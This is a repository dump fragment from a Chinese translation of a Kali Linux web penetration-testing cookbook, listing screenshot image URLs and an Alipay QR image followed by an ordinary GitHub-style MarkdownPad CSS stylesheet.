--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/8-2-4.jpg


--------------------------------------------------------------------------------
/img/8-3-1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/8-3-1.jpg


--------------------------------------------------------------------------------
/img/8-3-2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/8-3-2.jpg


--------------------------------------------------------------------------------
/img/8-3-3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/8-3-3.jpg


--------------------------------------------------------------------------------
/img/8-3-4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/8-3-4.jpg


--------------------------------------------------------------------------------
/img/8-4-1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/8-4-1.jpg


--------------------------------------------------------------------------------
/img/8-5-1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/8-5-1.jpg


--------------------------------------------------------------------------------
/img/8-5-2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/8-5-2.jpg


--------------------------------------------------------------------------------
/img/8-5-3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/8-5-3.jpg


--------------------------------------------------------------------------------
/img/8-6-1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/8-6-1.jpg


--------------------------------------------------------------------------------
/img/8-6-2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/8-6-2.jpg


--------------------------------------------------------------------------------
/img/8-6-3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/8-6-3.jpg


--------------------------------------------------------------------------------
/img/9-1-1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-1-1.jpg


--------------------------------------------------------------------------------
/img/9-1-2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-1-2.jpg


--------------------------------------------------------------------------------
/img/9-1-3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-1-3.jpg


--------------------------------------------------------------------------------
/img/9-1-4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-1-4.jpg


--------------------------------------------------------------------------------
/img/9-2-1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-2-1.jpg


--------------------------------------------------------------------------------
/img/9-2-2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-2-2.jpg


--------------------------------------------------------------------------------
/img/9-3-1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-3-1.jpg


--------------------------------------------------------------------------------
/img/9-3-2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-3-2.jpg


--------------------------------------------------------------------------------
/img/9-3-3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-3-3.jpg


--------------------------------------------------------------------------------
/img/9-3-4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-3-4.jpg


--------------------------------------------------------------------------------
/img/9-4-1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-4-1.jpg


--------------------------------------------------------------------------------
/img/9-4-2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-4-2.jpg


--------------------------------------------------------------------------------
/img/9-4-3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-4-3.jpg


--------------------------------------------------------------------------------
/img/9-5-1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-5-1.jpg


--------------------------------------------------------------------------------
/img/9-5-2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-5-2.jpg


--------------------------------------------------------------------------------
/img/9-5-3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-5-3.jpg


--------------------------------------------------------------------------------
/img/9-5-4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/9-5-4.jpg


--------------------------------------------------------------------------------
/img/qr_alipay.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/apachecn/kali-linux-web-pentest-cookbook-zh/138ea5a21b0e31bc5817884600f3a7ec045c7ada/img/qr_alipay.png


--------------------------------------------------------------------------------
/styles/ebook.css:
--------------------------------------------------------------------------------
  1 | /* GitHub stylesheet for MarkdownPad (http://markdownpad.com) */
  2 | /* Author: Nicolas Hery - http://nicolashery.com */
  3 | /* Version: b13fe65ca28d2e568c6ed5d7f06581183df8f2ff */
  4 | /* Source: https://github.com/nicolahery/markdownpad-github */
  5 | 
  6 | /* RESET
  7 | =============================================================================*/
  8 | 
  9 | html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video {
 10 |   margin: 0;
 11 |   padding: 0;
 12 |   border: 0;
 13 | }
 14 | 
 15 | /* BODY
 16 | =============================================================================*/
 17 | 
 18 | body {
 19 |   font-family: Helvetica, arial, freesans, clean, sans-serif;
 20 |   font-size: 14px;
 21 |   line-height: 1.6;
 22 |   color: #333;
 23 |   background-color: #fff;
 24 |   padding: 20px;
 25 |   max-width: 960px;
 26 |   margin: 0 auto;
 27 | }
 28 | 
 29 | body>*:first-child {
 30 |   margin-top: 0 !important;
 31 | }
 32 | 
 33 | body>*:last-child {
 34 |   margin-bottom: 0 !important;
 35 | }
 36 | 
 37 | /* BLOCKS
 38 | =============================================================================*/
 39 | 
 40 | p, blockquote, ul, ol, dl, table, pre {
 41 |   margin: 15px 0;
 42 | }
 43 | 
 44 | /* HEADERS
 45 | =============================================================================*/
 46 | 
 47 | h1, h2, h3, h4, h5, h6 {
 48 |   margin: 20px 0 10px;
 49 |   padding: 0;
 50 |   font-weight: bold;
 51 |   -webkit-font-smoothing: antialiased;
 52 | }
 53 | 
 54 | h1 tt, h1 code, h2 tt, h2 code, h3 tt, h3 code, h4 tt, h4 code, h5 tt, h5 code, h6 tt, h6 code {
 55 |   font-size: inherit;
 56 | }
 57 | 
 58 | h1 {
 59 |   font-size: 24px;
 60 |   border-bottom: 1px solid #ccc;
 61 |   color: #000;
 62 | }
 63 | 
 64 | h2 {
 65 |   font-size: 18px;
 66 |   color: #000;
 67 | }
 68 | 
 69 | h3 {
 70 |   font-size: 14px;
 71 | }
 72 | 
 73 | h4 {
 74 |   font-size: 14px;
 75 | }
 76 | 
 77 | h5 {
 78 |   font-size: 14px;
 79 | }
 80 | 
 81 | h6 {
 82 |   color: #777;
 83 |   font-size: 14px;
 84 | }
 85 | 
 86 | body>h2:first-child, body>h1:first-child, body>h1:first-child+h2, body>h3:first-child, body>h4:first-child, body>h5:first-child, body>h6:first-child {
 87 |   margin-top: 0;
 88 |   padding-top: 0;
 89 | }
 90 | 
 91 | a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
 92 |   margin-top: 0;
 93 |   padding-top: 0;
 94 | }
 95 | 
 96 | h1+p, h2+p, h3+p, h4+p, h5+p, h6+p {
 97 |   margin-top: 10px;
 98 | }
 99 | 
100 | /* LINKS
101 | =============================================================================*/
102 | 
103 | a {
104 |   color: #4183C4;
105 |   text-decoration: none;
106 | }
107 | 
108 | a:hover {
109 |   text-decoration: underline;
110 | }
111 | 
112 | /* LISTS
113 | =============================================================================*/
114 | 
115 | ul, ol {
116 |   padding-left: 30px;
117 | }
118 | 
119 | ul li > :first-child, 
120 | ol li > :first-child, 
121 | ul li ul:first-of-type, 
122 | ol li ol:first-of-type, 
123 | ul li ol:first-of-type, 
124 | ol li ul:first-of-type {
125 |   margin-top: 0px;
126 | }
127 | 
128 | ul ul, ul ol, ol ol, ol ul {
129 |   margin-bottom: 0;
130 | }
131 | 
132 | dl {
133 |   padding: 0;
134 | }
135 | 
136 | dl dt {
137 |   font-size: 14px;
138 |   font-weight: bold;
139 |   font-style: italic;
140 |   padding: 0;
141 |   margin: 15px 0 5px;
142 | }
143 | 
144 | dl dt:first-child {
145 |   padding: 0;
146 | }
147 | 
148 | dl dt>:first-child {
149 |   margin-top: 0px;
150 | }
151 | 
152 | dl dt>:last-child {
153 |   margin-bottom: 0px;
154 | }
155 | 
156 | dl dd {
157 |   margin: 0 0 15px;
158 |   padding: 0 15px;
159 | }
160 | 
161 | dl dd>:first-child {
162 |   margin-top: 0px;
163 | }
164 | 
165 | dl dd>:last-child {
166 |   margin-bottom: 0px;
167 | }
168 | 
169 | /* CODE
170 | =============================================================================*/
171 | 
172 | pre, code, tt {
173 |   font-size: 12px;
174 |   font-family: Consolas, "Liberation Mono", Courier, monospace;
175 | }
176 | 
177 | code, tt {
178 |   margin: 0 0px;
179 |   padding: 0px 0px;
180 |   white-space: nowrap;
181 |   border: 1px solid #eaeaea;
182 |   background-color: #f8f8f8;
183 |   border-radius: 3px;
184 | }
185 | 
186 | pre>code {
187 |   margin: 0;
188 |   padding: 0;
189 |   white-space: pre;
190 |   border: none;
191 |   background: transparent;
192 | }
193 | 
194 | pre {
195 |   background-color: #f8f8f8;
196 |   border: 1px solid #ccc;
197 |   font-size: 13px;
198 |   line-height: 19px;
199 |   overflow: auto;
200 |   padding: 6px 10px;
201 |   border-radius: 3px;
202 | }
203 | 
204 | pre code, pre tt {
205 |   background-color: transparent;
206 |   border: none;
207 | }
208 | 
209 | kbd {
210 |     -moz-border-bottom-colors: none;
211 |     -moz-border-left-colors: none;
212 |     -moz-border-right-colors: none;
213 |     -moz-border-top-colors: none;
214 |     background-color: #DDDDDD;
215 |     background-image: linear-gradient(#F1F1F1, #DDDDDD);
216 |     background-repeat: repeat-x;
217 |     border-color: #DDDDDD #CCCCCC #CCCCCC #DDDDDD;
218 |     border-image: none;
219 |     border-radius: 2px 2px 2px 2px;
220 |     border-style: solid;
221 |     border-width: 1px;
222 |     font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
223 |     line-height: 10px;
224 |     padding: 1px 4px;
225 | }
226 | 
227 | /* QUOTES
228 | =============================================================================*/
229 | 
230 | blockquote {
231 |   border-left: 4px solid #DDD;
232 |   padding: 0 15px;
233 |   color: #777;
234 | }
235 | 
236 | blockquote>:first-child {
237 |   margin-top: 0px;
238 | }
239 | 
240 | blockquote>:last-child {
241 |   margin-bottom: 0px;
242 | }
243 | 
244 | /* HORIZONTAL RULES
245 | =============================================================================*/
246 | 
247 | hr {
248 |   clear: both;
249 |   margin: 15px 0;
250 |   height: 0px;
251 |   overflow: hidden;
252 |   border: none;
253 |   background: transparent;
254 |   border-bottom: 4px solid #ddd;
255 |   padding: 0;
256 | }
257 | 
258 | /* TABLES
259 | =============================================================================*/
260 | 
261 | table th {
262 |   font-weight: bold;
263 | }
264 | 
265 | table th, table td {
266 |   border: 1px solid #ccc;
267 |   padding: 6px 13px;
268 | }
269 | 
270 | table tr {
271 |   border-top: 1px solid #ccc;
272 |   background-color: #fff;
273 | }
274 | 
275 | table tr:nth-child(2n) {
276 |   background-color: #f8f8f8;
277 | }
278 | 
279 | /* IMAGES
280 | =============================================================================*/
281 | 
282 | img {
283 |   max-width: 100%
284 | }


--------------------------------------------------------------------------------